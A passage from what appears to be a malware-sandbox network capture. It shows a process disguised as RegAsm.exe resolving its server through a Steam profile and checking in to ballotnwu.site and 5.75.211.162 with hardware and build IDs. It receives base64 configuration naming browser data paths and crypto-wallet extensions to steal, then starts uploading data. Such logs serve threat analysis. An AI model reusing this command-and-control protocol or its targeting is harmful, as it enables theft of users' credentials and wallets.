Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:16:30 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=8cf4ac2885e262b05e465dfb; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:16:30 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:16:30 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 22:16:30 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49771	172.67.128.144	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:31 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 22:16:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:31 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8m7jk9140gkh30o6u5lgpssotr; expires=Mon, 20 Jan 2025 16:03:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGrqY1UDJgnJ0xB%2BBcjxKkPq%2BElr1%2Bv%2B8PC20T%2BXq0PaHhdaHnEClBayCYNmQs5m0N7u%2F8yLhi8XsExSzBIvrYsXuHX5khYUOawgOVtk1Vcx%2FisNZIqSivt6RTxYwVzPIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e6d3a9119ff-EWR
2024-09-26 22:16:31 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49772	104.102.49.254	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:46 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:46 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:16:46 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=0dc85f652df5fa870847cd38; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:16:46 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:16:47 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 22:16:47 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 22:16:47 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49773	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:47 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49774	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:49 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:49 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 39 37 46 37 44 42 41 32 31 38 31 39 34 33 30 31 37 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="hwid"A897F7DBA218194301792-a33c7340-61ca------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AEBAFBGIDHCBFHIECFCB--
2024-09-26 22:16:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:49 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 38 39 36 63 33 65 38 37 32 37 39 39 34 65 30 37 33 37 37 61 66 33 66 36 35 36 39 31 32 62 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|9896c3e8727994e07377af3f656912b1\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49775	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:50 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:50 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 38 39 36 63 33 65 38 37 32 37 39 39 34 65 30 37 33 37 37 61 66 33 66 36 35 36 39 31 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="token"9896c3e8727994e07377af3f656912b1------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJKECAAAFHJECAAAEBFCCont
2024-09-26 22:16:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:51 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49776	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:51 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 38 39 36 63 33 65 38 37 32 37 39 39 34 65 30 37 33 37 37 61 66 33 66 36 35 36 39 31 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"9896c3e8727994e07377af3f656912b1------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AFHDGDGIIDGCFIDHDHDHCont
2024-09-26 22:16:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:52 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49777	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:53 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:53 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 38 39 36 63 33 65 38 37 32 37 39 39 34 65 30 37 33 37 37 61 66 33 66 36 35 36 39 31 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"9896c3e8727994e07377af3f656912b1------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIEHJKEBAAEBGCAAEBFHCont
2024-09-26 22:16:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:53 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49778	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:54 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6873 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:54 UTC	6873	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 47 49 49 4a 44 47 48 43 42 47 43 42 46 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 38 39 36 63 33 65 38 37 32 37 39 39 34 65 30 37 33 37 37 61 66 33 66 36 35 36 39 31 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 47 49 49 4a 44 47 48 43 42 47 43 42 46 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 47 49 49 4a 44 47 48 43 42 47 43 42 46 49 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------GIEBGIIJDGHCBGCBFIEGContent-Disposition: form-data; 